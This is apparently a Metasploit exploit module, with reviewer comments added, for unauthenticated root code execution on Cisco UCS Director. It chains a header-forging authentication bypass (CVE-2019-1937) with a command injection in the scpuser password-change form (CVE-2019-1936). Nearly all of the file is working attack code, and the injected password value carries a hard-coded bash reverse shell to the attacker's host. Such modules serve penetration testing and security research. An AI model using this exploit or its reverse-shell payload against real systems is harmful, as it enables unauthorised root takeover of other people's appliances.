Path: blob/master/modules/exploits/linux/http/cisco_ucs_rce.rb
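##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated root RCE against Cisco UCS Director by chaining the
# X-Starship header auth bypass (CVE-2019-1937) with the command injection in
# the scpuser password-change form (CVE-2019-1936).
#
# Flow: GET /app/ui/login to obtain a JSESSIONID, promote that session to
# admin via ClientServlet?apiName=GetUserInfo with forged X-Starship headers,
# then POST a doFormSubmit whose FIELD_ID_PASSWORD value carries a backticked
# shell command.
#
# NOTE(review): the selected payload is never injected. The module always
# sends a hard-coded `bash -i >& /dev/tcp/LHOST/LPORT` reverse shell built
# straight from datastore['LHOST']/['LPORT']; 'Arch' => ARCH_CMD and the
# cmd/unix/reverse_bash default are declarative only. Picking another
# command payload will not change what runs on the appliance.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco UCS Director Unauthenticated Remote Code Execution',
        'Description' => %q{
          The Cisco UCS Director virtual appliance contains two flaws that can be combined
          and abused by an attacker to achieve remote code execution as root.
          The first one, CVE-2019-1937, is an authentication bypass, that allows the
          attacker to authenticate as an administrator.
          The second one, CVE-2019-1936, is a command injection in a password change form,
          that allows the attacker to inject commands that will execute as root.
          This module combines both vulnerabilities to achieve the unauthenticated command
          injection as root.
          It has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
          Note that Cisco also mentions in their advisory that their IMC Supervisor and
          UCS Director Express are also affected by these vulnerabilities, but this module
          was not tested with those products.
        },
        'Author' => [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2019-1937' ], # auth bypass
          [ 'CVE', '2019-1936' ], # command injection
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-cmdinj' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-ucs-rce.txt' ]
        ],
        'Platform' => 'unix',
        # ARCH_CMD / reverse_bash are declared for the framework's benefit; see
        # the class comment - the injected command below is fixed.
        'Arch' => ARCH_CMD,
        'DefaultOptions' => {
          'payload' => 'cmd/unix/reverse_bash'
        },
        'Targets' => [
          [ 'Cisco UCS Director < 6.7.2.0', {} ]
        ],
        'Privileged' => true,
        'DefaultTarget' => 0,
        'DisclosureDate' => '2019-08-21',
        # Left as UNKNOWN_* by the author; nothing in this file establishes
        # whether the form submit also rewrites the real scpuser password.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Connect with TLS', true]),
        OptString.new('TARGETURI', [true, 'Default server path', '/'])
      ]
    )
  end

  # Referer value the UI front-end insists on. The scheme follows the SSL
  # option so it matches the origin we actually connect to, and the port is
  # omitted only for the default HTTPS port, as a browser would do.
  #
  # The original built this with `":" + rport`, which raises TypeError when
  # RPORT is normalized to an Integer; interpolation works for either form.
  def ui_referer
    scheme = ssl ? 'https' : 'http'
    port_suffix = rport.to_i == 443 ? '' : ":#{rport}"
    "#{scheme}://#{rhost}#{port_suffix}/"
  end

  # Headers without which ClientServlet ignores the request, merged with any
  # request-specific extras (e.g. the X-Starship pair for the auth bypass).
  def ui_headers(extra = {})
    {
      'X-Requested-With' => 'XMLHttpRequest',
      'Referer' => ui_referer
    }.merge(extra)
  end

  # First "name=value" pair from the Set-Cookie headers of +res+, or nil when
  # the server did not set any cookie. The original indexed into an empty
  # string here and would have sent a nil Cookie on the next request.
  def session_cookie(res)
    cookies = res.get_cookies.to_s
    return nil if cookies.strip.empty?

    cookies.split(';').first
  end

  # A 302 from /app/ui/login is the only fingerprint we have. It shows a UCS
  # Director-style UI is present, not that the target is unpatched, hence
  # Detected rather than Appears.
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'login'),
      'method' => 'GET'
    )
    return Exploit::CheckCode::Detected if res && res.code == 302

    Exploit::CheckCode::Unknown
  end

  # Runs the three-step chain described in the class comment. Fails loudly
  # (fail_with) at every step where the server does not answer as expected.
  def exploit
    # step 1: get a JSESSIONID cookie from the login page
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'login'),
      'method' => 'GET'
    )
    fail_with(Failure::Unreachable, "#{peer} - No response from the login page") unless res
    unless res.code == 200 || res.code == 302
      fail_with(Failure::Unknown, "#{peer} - Failed to obtain JSESSIONID cookie")
    end

    jsession = session_cookie(res)
    fail_with(Failure::Unknown, "#{peer} - Failed to obtain JSESSIONID cookie") unless jsession

    # step 2: authenticate our cookie as admin (CVE-2019-1937).
    # The X-Starship-* headers are the key to the auth bypass, see the
    # References; their values only need to be present, hence random text.
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'ClientServlet'),
      'cookie' => jsession,
      'vars_get' => {
        'apiName' => 'GetUserInfo'
      },
      'headers' => ui_headers(
        'X-Starship-UserSession-Key' => rand_text_alpha(5..12),
        'X-Starship-Request-Key' => rand_text_alpha(5..12)
      ),
      'method' => 'GET'
    )

    unless res && res.code == 200 && res.body.include?('admin')
      fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie")
    end

    # if the server returns a new cookie, use that; otherwise keep the old one
    jsession = session_cookie(res) || jsession
    print_good("#{peer} - Successfully bypassed auth and got our admin JSESSIONID cookie!")

    # step 3: request our reverse shell (CVE-2019-1936).
    # The FIELD_ID_PASSWORD value is evaluated in a root shell; the backticks
    # are the injection. The local is named op_data rather than `payload` so it
    # does not shadow the framework's payload accessor. The string, including
    # the trailing double backtick, is kept byte-for-byte - presumably it is
    # the exact quoting the author validated against the form.
    op_data = %{{"param0":"admin","param1":{"ids":null,"targetCuicId":null,"uiMenuTag":23,"cloudName":null,"filterId":null,"id":null,"type":10},"param2":"scpUserConfig","param3":[{"fieldId":"FIELD_ID_USERNAME","value":"scpuser"},{"fieldId":"FIELD_ID_DESCRIPTION","value":"The 'scpuser' will be configured on this appliance in order to enable file transfer operations via the 'scp' command. This user account cannot be used to login to the GUI or shelladmin."},{"fieldId":"FIELD_ID_PASSWORD","value":"`bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 &``"}]}}

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'ui', 'ClientServlet'),
      'cookie' => jsession,
      'headers' => ui_headers,
      'method' => 'POST',
      'vars_post' => {
        'formatType' => 'json',
        'apiName' => 'ExecuteGenericOp',
        'serviceName' => 'InfraMgr',
        'opName' => 'doFormSubmit',
        'opData' => op_data
      }
    )

    # A 200 only tells us the form submit was accepted; whether the command
    # actually ran is only visible through the incoming connection.
    print_good("#{peer} - Shelly is here, press ENTER to start playing with her!") if res && res.code == 200
  end
end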